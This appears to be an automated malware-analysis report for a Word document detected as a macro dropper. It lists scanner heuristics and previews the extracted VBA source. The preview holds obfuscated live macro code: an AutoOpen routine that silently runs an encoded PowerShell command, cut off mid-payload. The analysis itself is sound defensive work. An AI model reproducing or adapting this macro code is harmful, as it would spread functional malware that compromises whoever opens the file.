MALICIOUS
242
Risk Score
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6568182-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6568182-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10313 bytes |
SHA-256: e99d9df43adc5036070c77a9d7f042d2b12ae4b13aad33670e102c6f1b58947a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "TYnQjlOFSoE" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function qCHtznqwaWX() On Error Resume Next qKIXCX = 15075 + Log(65690) - Ukwad / Atn(35909) / akGjF / VQNYo miIDDL = CSng(38432 * CInt(74338) + 18665 - 74314) bbAjiv = 79004 + Log(68400) - sqhtk / Atn(65356) / ppsKii / wpMhvO jEoJi = CSng(15980 * CInt(9274) + 37921 - 74822) qCHtznqwaWX = slqtcfJls + Shell(BVidaZSh + Chr(vbKeyP) + UoEdzMcBLl + iCwTk + ofNnY + CCEPIolX + jjWDFwJwSEi, PLVTX + vbHide + hcdJRZ) Yoanw = 1642 + Log(29548) - ViiwR / Atn(54315) / tzErWN / UEMltj ZcWCX = CSng(73332 * CInt(79558) + 14479 - 78539) End Function Sub Autoopen() On Error Resume Next owOaj = 59432 + Log(67377) - LMlJAb / Atn(32354) / iTVaK / fNvCI uqHlKE = CSng(6838 * CInt(48762) + 98960 - 37084) qCHtznqwaWX ZdwhXT = 31769 + Log(53642) - lPHVlO / Atn(80093) / RAihWo / VEAwvY HLivzL = CSng(50905 * CInt(14674) + 88867 - 59442) End Sub Attribute VB_Name = "OIiimAwOXIw" Function UoEdzMcBLl() On Error Resume Next FwjniG = 75769 + Log(59161) - ANiAm / Atn(14703) / uoBZrN / Yvzpc QKoVd = CSng(42462 * CInt(63964) + 28886 - 66225) DAYJfIkNwc = "owersHe" + "LL " + "-e KABuA" + "GUAdw" mkRLs = 689 + Log(71122) - awHjKN / Atn(12134) / sjHriR / KoqZM QaTMP = CSng(29760 * CInt(78452) + 50520 - 3229) vRZHMAZrjN = "AtAG8AYg" + "BK" + "AGUAQwBUACAAIAB" + "JAE8ALgB" YKAOf = 24996 + Log(63270) - aPmdBH / Atn(83121) / VZHXCb / cKWoX wRQqIj = CSng(62202 * CInt(66798) + 4748 - 60753) fIXzJTRslj = "DAG8A" + "TQBwAFIARQBzA" + "HMAaQBPAE4AL" + "gBkAGUARgB" + "MAGEAdABFAFMA" Hqwzkm = 48489 + Log(23377) - auPTi / Atn(42147) / mXEJYJ / bzWmt KHStJ = CSng(29439 * CInt(23025) + 55115 - 52910) EFHqbd = "dABSAEUAYQBNACg" + "AWwBJAE8ALgB" + "tAEUAbQBvAFIAWQ" + "BTAHQAcg" + "BFAEEAT" + "QBdAC" XwcCUE = 3733 + Log(95112) - mntLw / Atn(42195) / wkWzO / joKTbV PJUKf = CSng(61926 * CInt(24662) + 93107 - 12775) kmdFEovUm = "AAW" + "wBjAG8AbgBWAGU" + "AcgB0AF" + "0AOgA6AGYAcg" + "BPAE0" + "AYgB" XwYaHj = 32486 + Log(92139) - XlQbF / Atn(54738) / YQnsBd / owcTjf JcrAz = CSng(5842 * CInt(80407) + 47263 - 48241) dbpATjNwKh = "hAFM" + "AZQA2ADQAcwBUA" + "HIASQBuA" + "GcAKAAnAFQAWgBI" + "AG" + "YAYQA5AHMAdwB" UoEdzMcBLl = DAYJfIkNwc + vRZHMAZrjN + fIXzJTRslj + EFHqbd + kmdFEovUm + dbpATjNwKh End Function Function iCwTk() On Error Resume Next tXGwY = 97103 + Log(67167) - iBHwJ / Atn(27214) / uQkiiQ / QCOJZa Znzri = CSng(98554 * CInt(58648) + 43257 - 64885) TwXlU = "FAE0AZgB" + "mAEIALwAw" + "AGYAUg" + "BEAEMAVgBqAE" + "IAdABwAFQAVw" + "BDAFUAbQBrAEgA" + "YQBoAEkAMA" + "A4AE4ATgAxAHcAU" + "wBwAGUAeQ" wtFAd = 20029 + Log(25083) - dREnF / Atn(89243) / oLGEjO / IHINH bOEYi = CSng(39464 * CInt(61455) + 72236 - 22578) zRwEvTbd = "BCADgAd" + "gB5A" + "HUAWABGA" + "GkAUwA4" msBqvJ = 4232 + Log(73874) - FztnXS / Atn(96263) / YkzrQ / IrONj kOIci = CSng(39733 * CInt(23022) + 65677 - 47480) wGWWDj = "AGEAVwBrA" + "DMAWQBoA" + "C8ALwB2AHUAM" + "ABqAHgAVQA0AFAA" + "UAAzAH" + "AATQA5AHgAdgB3A" zFWfCH = 63713 + Log(52214) - FkTHAN / Atn(79169) / pswjw / hzroR CGPcu = CSng(72671 * CInt(85880) + 40912 - 71069) UKbAjb = "EwAYgA" + "2AFYAe" + "AAzAE8AZg" + "B2A" + "E8ATABn" + "AFcAMwBQAE8ATAB" + "BAEkAOA" + "BIADM" + "AU" + "QA1AGQ" BKnjb = 39439 + Log(33325) - IOpwW / Atn(79316) / zDjohL / PRdzU MOVTlo = CSng(83275 * CInt(76096) + 86649 - 30627) EjPRk = "AdAB" + "5AEQARQA" + "4AGoATABq" + "AG4A" + "SQ" + "BXAHU" + "AM" NjjjCT = 8389 + Log(69008) - CziJjD / Atn(79773) / vVCbAa / ttVNhz EnobAb = CSng(72546 * CInt(24845) + 96225 - 49164) AijVpSDdi = "QB6AFYAMA" + "BkAEI" + "ANgB2AFYARQA3AE" + "kAU" tpPjM = 75925 + Log(64602) - IsXNSM / Atn(12062) / nJwqCc / tvUEC ziXcM = CSng(12563 * CInt(71294) + 61293 - 25348) UEVBGImp = "wBXAFEAVAA1AG" + "4AdQBDA" + "GgAUQA1AFYAd" + "AB5AEQAZQBJA" + "GgAaQB4ADUA" + "NwB6AHoAVQBjAGc" + "ARgBlA" + "FAAawBNADIAc" + "gBVAHEAdwB ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.